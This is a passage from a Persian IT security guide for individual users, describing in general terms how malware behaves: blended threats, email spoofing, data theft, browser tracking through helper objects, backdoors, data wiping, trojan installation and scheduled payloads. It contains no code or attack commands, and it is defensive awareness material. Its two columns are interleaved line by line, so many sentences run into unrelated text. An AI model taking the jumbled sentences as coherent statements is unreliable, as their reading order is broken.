‫ﺁﻟﻮﺩﻩ ﻳﺎﻓﺘﻪ ﺍﺳﺖ( ﺍﻳﻦ ﺷـﻤﺎ ﻫـﺴﺘﻴﺪ ﻛـﻪ ﻣـﺘﻬﻢ ﺑـﻪ ﺗﻮﺯﻳـﻊ ﺍﻳـﻦ‬ ‫ﺍﺯ ﻳﻚ ﻭﻳﮋﮔﻲ ﺑﻨﻮﻳﺴﻨﺪ؛ ﻣﺎﻧﻨﺪ ﺗـﺮﺍﻭﺍﻱ ﺧـﻮﺩ ﺗﻜـﺮﺍﺭ ﺷـﻮﻧﺪﻩ‪.٤٠‬‬
‫ﻭﻳﺮﻭﺱ ﺧﻮﺍﻫﻴﺪ ﺷﺪ! )ﺍﻳﻦ ﻓﻦ ﮔﻤﺮﺍﻩﻛﻨﻨﺪﮔﻲ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪ ٤٦‬ﻧـﺎﻡ‬ ‫ﺑﺪﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺩﺍﺭﺍﻱ ﺑـﻴﺶ ﺍﺯ ﻳـﻚ ﺧـﺼﻮﺻﻴﺖ ﻣﺨـﺮﺏ ﺍﺳـﺖ‬
‫ﺩﺍﺭﺩ ﻭ ﺩﺭﺻﻮﺭﺕ ﺍﺳﺘﻔﺎﺩﺓ ﺑﺮﻧﺎﻣﺔ ﻣﺨﺮﺏ ﺍﺯ ﺁﻥ‪ ،‬ﺑﺴﺎﺩﮔﻲ ﻧﻤﻲﺗﻮﺍﻥ ﻣـﺸﺨﺺ‬ ‫ﺗﻬﺪﻳﺪ ﭼﻨﺪﻭﺟﻬﻲ‪ ٤١‬ﻧﺎﻣﻴﺪﻩ ﻣـﻲ ﺷـﻮﺩ‪ .‬ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﻣـﺸﺎﻫﺪﻩ‬
‫ﻛﺮﺩ ﻛﻪ ﺭﺍﻳﺎﻧﺔ ﺁﻟﻮﺩﺓ ﻭﺍﻗﻌﻲ ﻣﺘﻌﻠﻖ ﺑﻪ ﭼﻪ ﻛﺴﻲ ﺍﺳﺖ(‬ ‫ﻣــﻲﻛﻨﻴــﺪ ﺍﻳــﻦ ﻋﻨــﺎﻭﻳﻦ ﻋﻤﻮﻣــﹰﺎ ﺍﺯ ﺭﻭﻱ ﻧﺤــﻮﺓ ﮔــﺴﺘﺮﺵ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﺗﻌﺮﻳﻒ ﺷﺪﻩﺍﻧﺪ ﻭ ﻧـﻪ ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﻧﺤـﻮﺓ‬
‫ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫ﻋﻤﻠﻜﺮﺩ ﺁﻧﻬﺎ‪ .‬ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﭼﮕﻮﻧﮕﻲ ﻋﻤﻠﻜﺮﺩ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ‬
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﻣﻲ ﺗﻮﺍﻧـﺪ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺭ ﻣـﻮﺭﺩ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﻭ‬ ‫ﺭﺍﻫﻬﺎﻱ ﺍﻧﺘﺸﺎﺭ ﺁﻧﻬﺎ ﺑﺮﺭﺳـﻲ ﻣـﻲﺷـﻮﺩ‪ .‬ﺩﺭ ﻓـﺼﻠﻬﺎﻱ ﺑﻌـﺪ ﻧﻴـﺰ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺁﻥ ﺑﺪﺳﺖ ﺁﻭﺭﺩ ﻭ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ‬ ‫ﺭﻭﺷﻬﺎﻱ ﺍﻳﻤﻦ ﺳـﺎﺧﺘﻦ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ ﺷـﺒﻜﻪﻫـﺎ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺍﻳـﻦ‬
‫ﻧﻮﻳﺴﻨﺪﺓ ﺧﻮﺩ ﻗﺮﺍﺭ ﺩﻫﺪ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣـﻪ ﻣـﻲﺗﻮﺍﻧـﺪ ﻫﻤـﺔ ﻓﺎﻳﻠﻬـﺎﻱ‬ ‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪.‬‬
‫ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ )ﺣﺘﻲ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ( ﺭﺍ ﺑﺨﻮﺍﻧﺪ‪ .‬ﺍﮔﺮ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﻳﺎ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒـﺎﺭﻱ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﺭﺍﻳﺎﻧـﻪ ﺫﺧﻴـﺮﻩ‬ ‫ﻋﻤﻠﻜﺮﺩ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ‬
‫ﻣﻲ ﻛﻨﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﻣﻮﺭﺩ ﻋﻼﻗﺔ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﺎﺷﻨﺪ‪.‬‬ ‫ﻫﻴﭻ ﻣﺤﺪﻭﺩﻳﺘﻲ ﺩﺭ ﭼﮕﻮﻧﮕﻲ ﻓﻌﺎﻟﻴـﺖ ﻧـﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ ﻣﺨـﺮﺏ‬
‫ﺍﮔﺮ ﺍﺯ ﺍﻣﻀﺎﻱ ﺧﻮﺩ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﺗﺼﻮﻳﺮﻱ ﺗﻬﻴﻪ ﻛﺮﺩﻩ ﺑﺎﺷـﻴﺪ ﺗـﺎ ﺍﺯ‬ ‫ﻻ ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺩﺭ‬
‫ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ ﻭﺟﻮﺩ ﻧـﺪﺍﺭﺩ‪ ،‬ﺍﻣـﺎ ﻣﻌﻤـﻮ ﹰ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺧﻮﺩ ﻭﺍﺟﺪ ﻭﻳﮋﮔﻴﻬﺎﻱ ﻣﺸﺘﺮﻛﻲ ﻫﺴﺘﻨﺪ‪:‬‬
‫‪42‬‬ ‫‪Attachment‬‬
‫‪43‬‬ ‫‪Body‬‬
‫‪44‬‬ ‫‪Subject Field‬‬
‫‪45‬‬ ‫‪From Field‬‬ ‫‪40‬‬ ‫‪Self-Replicating Trojan‬‬
‫‪46‬‬ ‫‪Email Spoofing‬‬ ‫‪41‬‬ ‫‪Blended Threat‬‬
‫‪٧٣‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﺑﺮﻧﺎﻣﺔ ﺧﺎﺻـﻲ ﺭﺍ ﺁﻏـﺎﺯ ﻣـﻲﻛﻨﻴـﺪ ﺑـﻪ ﺍﺟـﺮﺍ ﺩﺭ ﻣـﻲﺁﻳـﺪ‪ .‬ﺗﻨﻬـﺎ‬ ‫ﺁﻥ ﺩﺭ ﭼﺎﭖ ﻭ ﻳﺎ ﺍﺭﺳﺎﻝ ﻧﺎﻣﻪﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‪ ،‬ﺁﻥ ﻫـﻢ ﻣﻤﻜـﻦ‬
‫ﻣﺤﺪﻭﺩﻳﺘﻲ ﻛﻪ ﻋﻤﻠﻜﺮﺩ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫـﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‬ ‫ﺍﺳﺖ ﺑﻜﺎﺭ ﻣﻬﺎﺟﻤﺎﻥ ﺑﻴﺎﻳﺪ‪ .‬ﺟﻤﻊﺁﻭﺭﻱ ﺍﻳﻦ ﺑﺴﺘﻪ ﻫﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ‬
‫ﺗﺼﻮﺭﺍﺕ ﻭ ﻣﻬﺎﺭﺕ ﭘﺪﻳﺪﺁﻭﺭﻧﺪﺓ ﺁﻧﻬﺎ ﺍﺳﺖ‪.‬‬ ‫ﺩﺭ ﻛﻨﺎﺭ ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻢ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ ﻛﻪ‬
‫ﺑﺘﻮﺍﻧﺪ ﺍﺯ ﻫﻮﻳﺖ ﺷﻤﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨـﺪ‪ .‬ﺍﮔـﺮ ﺩﺭ ﻳـﻚ ﺷـﺮﻛﺖ‬
‫‪٤٨‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺩﻳﺎﺑﻲ ﻭ ﺍﻋﻤﺎﻝ ﺗﻐﻴﻴﺮ ﺩﺭ ﺷﺒﻜﻪ‬ ‫ﺗﺠﺎﺭﻱ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺷﻤﺎﺭﻩﻫﺎﻱ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺍﻓﺮﺍﺩ ﺩﻳﮕـﺮ‬
‫ﺍﻳﻦ ﺩﺳﺘﻪ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎ ﭘﺎﻳﮕﺎﻫﻬﺎﻳﻲ ﻛﻪ ﺷﻤﺎ ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﻴـﺪ ﺭﺍ‬ ‫ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻣﻲ ﻧﻤﺎﻳﻴﺪ‪ ،‬ﺩﺭﺻﻮﺭﺕ ﺩﺯﺩﻳـﺪﻩ ﺷـﺪﻥ‬
‫ﻧﻈﺎﺭﻩ ﻣﻲﻛﻨﻨﺪ ﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻋﻼﻭﻩ ﺑﺮ ﺁﻧﭽﻪ ﻛـﻪ ﺷـﻤﺎ ﺩﺭ ﺣﺎﻟـﺖ‬ ‫ﺍﻳﻦ ﺷﻤﺎﺭﻩﻫﺎ ﻣﺸﻜﻼﺕ ﺟﺪﻱ ﺑﺮﺍﻳﺘﺎﻥ ﭘﻴﺶ ﺧﻮﺍﻫﺪ ﺁﻣﺪ‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﻣﻌﻤﻮﻝ ﻣﺸﺎﻫﺪﻩ ﻣـﻲ ﻛﻨﻴـﺪ ﺻـﻔﺤﺎﺕ ﺩﻳﮕـﺮﻱ ﺭﺍ ﺑـﻪ ﻧﻤـﺎﻳﺶ‬


‫ﺑﺎﺯﻧﻮﻳﺴﻲ ﻳﺎ ﺣﺬﻑ ﺩﺍﺩﻩﻫﺎ‬
‫ﺩﺭﺁﻭﺭﻧﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺍﺳﺖ ﺭﺍ ﺑـﺎ‬
‫ﺗﺒﻠﻴﻐﺎﺕ ﺧﻮﺩ ﺟﺎﻳﮕﺰﻳﻦ ﻧﻤﺎﻳﻨﺪ‪ ،‬ﻭ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ‬ ‫ﺑﺮﺧﻲ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﻭﺍﻗﻌﹰﺎ ﺁﺳﻴﺐﺭﺳﺎﻥ ﻫﺴﺘﻨﺪ؛ ﺑﻪ ﺍﻳﻦ‬
‫ﻭ ﺗﻌــﺎﻣﻼﺗﻲ ﻛــﻪ ﺑــﺎ ﺗﻮﻟﻴﺪﻛﻨﻨــﺪﺓ ﺁﻥ ﺍﻧﺠــﺎﻡ ﺩﺍﺩﻩﺍﻳــﺪ ﺑــﺮﺍﻱ‬ ‫ﺗﺮﺗﻴﺐ ﻛﻪ ﺑﺎ ﻭﺍﺭﺩ ﻛﺮﺩﻥ ﺩﺍﺩﻩ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﺴﺮﻋﺖ ﻣﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﭘﺪﻳﺪﺁﻭﺭﻧﺪﺓ ﺧﻮﺩ ﺑﻔﺮﺳﺘﻨﺪ‪ .‬ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣـﻮﺍﺭﺩ‬ ‫ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺩﻳﺴﻚ ﺳﺨﺖ ﺭﺍ ﭘﺎﻙ ﻛﻨﻨـﺪ ﻳـﺎ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﺎ‬
‫ﺩﺍﺭﺍﻱ ﻛﻨﺘﺮﻝ ﻛﺎﻣﻞ ﺑﺮ ﺭﻭﻱ ﻣﺮﻭﺭﮔﺮ ﺷـﻤﺎ ﻫـﺴﺘﻨﺪ‪ :‬ﺁﻧﭽـﻪ ﻭﺍﺭﺩ‬ ‫ﺍﻃﻼﻋﺎﺕ ﻧﺎﺩﺭﺳﺖ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ‬
‫ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﻧﻈﺎﺭﻩ ﻣﻲﻛﻨﻨﺪ ﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﻧﭽـﻪ ﻛـﻪ ﻣـﻲﺑﻴﻨﻴـﺪ ﺭﺍ‬ ‫ﺑﺎ ﺭﻭﺷﻬﺎﻳﻲ ﻛـﻪ ﺍﺣﺘﻤـﺎﻝ ﺷﻨﺎﺳـﺎﻳﻲ ﻛﻤﺘـﺮﻱ ﺩﺍﺭﻧـﺪ ﺗﻐﻴﻴـﺮﺍﺕ‬
‫ﺗﻐﻴﻴﺮ ﺩﻫﻨﺪ؛ ﻭ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻣﺸﺎﻫﺪﺍﺕ ﺷﻤﺎ ﺭﺍ ﺗﺤـﺖ ﻧﻈـﺮ ﺩﺍﺭﻧـﺪ‬ ‫ﮔﻔﺘﻪﺷﺪﻩ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ‪:‬‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﻳﻚ ﻣﻘﺼﺪ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴـﻴﻦﺷـﺪﻩ‬
‫ﮔﺰﺍﺭﺵ ﺩﻫﻨﺪ‪ .‬ﺩﺭ ‪ ،Internet Explorer‬ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﻃﺮﺍﺣﻲ‬ ‫ﻧﺼﺐ ﻳﻚ ﺗﺮﻭﺍ‬
‫ﺷﺪﻩ ﻭ ‪ ٤٩BHO‬ﻧﺎﻡ ﺩﺍﺭﺩ‪ .‬ﺍﮔﺮﭼﻪ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧـﺪ ‪BHO‬ﻫـﺎﻱ‬ ‫ﺍﻳﻦ ﻋﻤﻠﻜﺮﺩ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﺑﺴﻴﺎﺭ ﺭﺍﻳـﺞ ﺷـﺪﻩ ﺍﺳـﺖ‪.‬‬
‫ﺳﺎﻟﻢ ﻭ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪﻱ ﺭﺍ ﭘﺪﻳﺪ ﺁﻭﺭﺩ‪ ،‬ﺍﻣﺎ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﺮﺍﻱ ﺍﻳﺠـﺎﺩ‬ ‫ﻻ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻧﺼﺐ ﺷـﺪﻩ ﻭ ﻟـﺬﺍ ﺑﺮﻧﺎﻣـﺔ‬ ‫ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻛﻪ ﺍﺧﻼﻗﻴﺎﺕ ﺩﺭ ﺁﻧﻬﺎ ﻛﻤﺘﺮ ﺭﻋﺎﻳـﺖ ﺷـﺪﻩ‬ ‫ﻣﺨﺮﺏ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺷـﻤﺎ ﻳـﺎ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﺍﺯ ﺁﻥ‬
‫ﻧﻴﺰ ﺍﻣﻜﺎﻧﺎﺕ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩ ﺍﺳﺖ‪.‬‬ ‫ﺍﺳﺘﻔﺎﺩﺓ ﺯﻳﺎﺩﻱ ﻣﻲﻛﻨﻴﺪ ﺟﺎﻳﮕﺰﻳﻦ ﺷـﻮﺩ )ﻣﻌﻨـﺎﻱ ﺍﺻـﻠﻲ ﺗـﺮﺍﻭﺍ(‪ .‬ﺍﺯ‬
‫‪٥٠‬‬
‫ﺍﻳﻦ ﮔﺬﺷﺘﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﺩﻳﮕـﺮﻱ ﺭﺍ ﻭﺍﺭﺩ ﺳﻴـﺴﺘﻢ‬
‫ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ‬
‫ﻛﻨﺪ ﻛﻪ ﺩﺭ ﻳﻚ ﺯﻣﺎﻥ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦ ﺷـﺪﻩ ﻳـﺎ ﻫﻨﮕـﺎﻡ ﺭﻭﺷـﻦ‬
‫ﻻ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻧﻴـﺎﺯ ﺑـﻪ ﻭﺍﺭﺩ‬ ‫ﻣﻌﻤﻮ ﹰ‬ ‫ﺷﺪﻥ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﻨﺪ‪ .‬ﺩﺭ ﺑﺨـﺶ "ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺳـﺮﺑﺎﺭ"‬
‫ﻛﺮﺩﻥ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒـﻮﺭ ﺩﺍﺭﻳـﺪ؛ ﺍﮔﺮﭼـﻪ ﺍﻳـﻦ ﺳـﻄﺢ ﺍﺯ‬ ‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺭﻭﺷﻬﺎ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻟﺤـﺎﻅ ﻓﻴﺰﻳﻜـﻲ‬
‫ﺍﻳﻤﻦ ﻫـﺴﺘﻨﺪ ﻭ ﺗﻨﻬـﺎ ﺍﺷـﺨﺎﺹ ﺧﺎﺻـﻲ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﭘـﺸﺖ‬ ‫ﺯﻣﺎﻧﺒﻨﺪﻱ ﺑﺮﺍﻱ ﺁﻳﻨﺪﻩ‬
‫ﺻﻔﺤﻪﻛﻠﻴﺪ ﺁﻧﻬﺎ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﻮﻧﺪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ .‬ﻧﺮﻡﺍﻓـﺰﺍﺭ "ﺩﺭﺏ‬ ‫ﻫﺮﻳﻚ ﺍﺯ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﮔﻔﺘﻪ ﺷﺪﻩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻼﻓﺎﺻﻠﻪ ﺍﺗﻔﺎﻕ‬
‫ﻣﺨﻔﻲ" ﺑﺎ ﺑﻲﺍﺛﺮ ﻛﺮﺩﻥ ﻛﻠﻴﺔ ﺣﻔﺎﻇﻬـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺍﻳﻨﭽﻨﻴﻨـﻲ ﺑـﻪ‬ ‫ﺑﻴﻔﺘﻨﺪ ﻭ ﻳﺎ ﺑﺮﺍﻱ ﻭﻗﻮﻉ ﺩﺭ ﺁﻳﻨﺪﻩ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺷﻮﻧﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜـﺎﻝ‬
‫ﻛﺎﺭﺑﺮ ﺭﺍﻩ ﺩﻭﺭ‪ ٥١‬ﺍﺟﺎﺯﺓ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﻣﻲﺩﻫـﺪ‪ .‬ﺍﻳـﻦ‬ ‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﻋﻼﻗﻪﻣﻨﺪ ﺑﺎﺷـﻨﺪ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺣﺘﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺣﻔﺎﻇﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺭﺍ ﻛﺎﺭ ﺑﮕﺬﺍﺭﺩ‬ ‫ﻛﻪ ﺍﻋﻼﻡ ﺷﻮﺩ ﻳﻚ ﻛﺮﻡ ﺧﺎﺹ ﺩﺭ ﺭﻭﺯﻫﺎﻱ ﺍﻭﻟﻴﺔ ﮊﺍﻧﻮﻳـﺔ ﺳـﺎﻝ‬
‫ﺗﺎ ﺗﻨﻬﺎ ﭘﺪﻳﺪﺁﻭﺭﻧﺪﺓ ﺁﻥ ﺑﺘﻮﺍﻧﺪ ﺍﺯ ﺳﻴﺴﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳـﺪ‪ .‬ﺍﮔﺮﭼـﻪ‬ ‫‪ ۲۰۰۰‬ﻳﻚ ﺧﺮﺍﺑﻲ ﺑﺰﺭﮒ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ‪.‬‬
‫ﺍﻳﻦ ﺟﺰﺋﻴﺎﺕ ﺍﺯ ﻳﻚ ﻣﻮﺭﺩ ﺗﺎ ﻣـﻮﺭﺩ ﺩﻳﮕـﺮ ﻣﺘﻔـﺎﻭﺕ ﺍﺳـﺖ‪ ،‬ﺍﻣـﺎ‬
‫‪٤٧‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺳﺮﺑﺎﺭ‬

‫‪48‬‬ ‫‪Web Tracking/Modification Software‬‬


‫ﻻ ﺑﻪ ﺷﻜﻞ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻇﺎﻫﺮ ﻣﻲﺷـﻮﺩ ﻛـﻪ‬ ‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﻣﻌﻤﻮ ﹰ‬
‫‪49‬‬ ‫‪Browser Helper Object -‬‬
‫‪http://msdn.microsoft.com/library/enus/dnweb‬‬
‫ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻣﻲﻧﺸﻴﻨﺪ ﻭ ﺯﻣﺎﻧﻲﻛﻪ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﺭﻭﺷـﻦ ﻳـﺎ‬
‫‪gen/html/bho.asp‬‬
‫‪50‬‬ ‫‪Backdoors‬‬
‫‪51‬‬ ‫‪Remote User‬‬ ‫‪47‬‬ ‫‪Payload Software‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٧٤‬‬

‫ﺭﻭﻱ ﺻﻔﺤﺔ ﻭﺏ ﺍﻳﻤﻦ ﻭﺍﺭﺩ ﻛﻨﻴﺪ )ﻳﻌﻨﻲ ﺍﮔﺮ ﻫﻨﮕﺎﻡ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋـﺎﺕ‬ ‫ﻛﺎﺭﺑﺮ ﺭﺍﻩ ﺩﻭﺭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻛﻨﺘﺮﻝ ﻛﺎﻣﻞ ﭘﻴﺪﺍ‬
‫ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺷـﻮﺩ(‪ ،‬ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪ ﺩﻗﻴﻘـﹰﺎ ﺁﻧﭽـﻪ ﻛـﻪ ﺗﺎﻳـﭗ‬ ‫ﻛﺮﺩﻩ ﺑﺎﺷﺪ‪ .‬ﺣﺘﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﺍﮔـﺮ ﺑﺨﻮﺍﻫﻨـﺪ‪،‬‬
‫ﻣﻲﻛﻨﻴﺪ ﺭﺍ ‪ -‬ﺑﺼﻮﺭﺕ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﺸﺪﻩ ‪ -‬ﺛﺒﺖ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬ ‫ﺑﺘﻮﺍﻧﻨﺪ ﺷﻤﺎ ﺭﺍ ﺍﺯ ﺍﺩﺍﻣﺔ ﻛﺎﺭﺗﺎﻥ ﺑﺎﺯﺩﺍﺭﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ‬
‫ﺗﺤﺖ ﻓﺮﻣﺎﻥ ﺷﺨﺺ ﺩﻳﮕﺮﻱ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻭ ﺷـﻤﺎ ﺍﺯ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ‬
‫ﺳﺮﻗﺖ ﻣﺎﻟﻲ‬ ‫ﺁﮔﺎﻫﻲ ﻧﺪﺍﺭﻳﺪ‪ .‬ﺍﻣﺎ ﺳﺆﺍﻟﻲ ﻛﻪ ﭘﻴﺶ ﻣﻲﺁﻳﺪ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﭼـﺮﺍ‬
